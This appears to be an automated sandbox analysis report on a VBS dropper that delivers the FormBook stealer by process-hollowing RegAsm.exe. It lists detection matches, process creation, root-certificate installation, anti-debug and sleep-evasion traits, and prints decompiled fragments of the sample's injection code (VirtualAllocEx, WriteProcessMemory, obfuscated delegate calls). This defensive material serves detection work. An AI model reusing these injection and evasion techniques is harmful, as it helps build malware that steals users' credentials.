Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@5/1@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source:	Binary string: VCBJER234.pdb source: wscript.exe, 00000000.00000003.371603253.0000000003ED3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371785671.000000000476B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371651218.0000000003BCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371908468.0000000004410000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.364263905.00000000012F2000.00000020.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777264)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777245))})
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777264)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777245))})
Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777264)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777245))})

Source: temp_executable.exe.0.dr

Static PE information: 0xB915B30D [Fri May 25 21:30:53 2068 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004030E0 push eax; ret	3_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041488D pushfd ; iretd	3_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401966 push esi; iretd	3_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402179 push ss; retf	3_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415AE7 pushad ; ret	3_2_00415AE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4C7 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4CD push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004154B9 push edi; retf	3_2_004154BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418DD0 push ebp; ret	3_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D589 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004116BB push edi; retf	3_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413FC3 push edi; ret	3_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022FDFA1 push ecx; ret	3_2_022FDFB4

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'CwecqSo7Q1xXT', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'CwecqSo7Q1xXT', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'CwecqSo7Q1xXT', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.4446a90.2.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 3C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02340101 rdtsc

3_2_02340101

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Window / User API: threadDelayed 495

Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 3300	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3364	Thread sleep count: 495 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3400	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02340101 rdtsc

3_2_02340101

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_022F07AC NtCreateMutant,LdrInitializeThunk,

3_2_022F07AC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_023026F8 mov eax, dword ptr fs:[00000030h]

3_2_023026F8

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_executable.exe.0.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

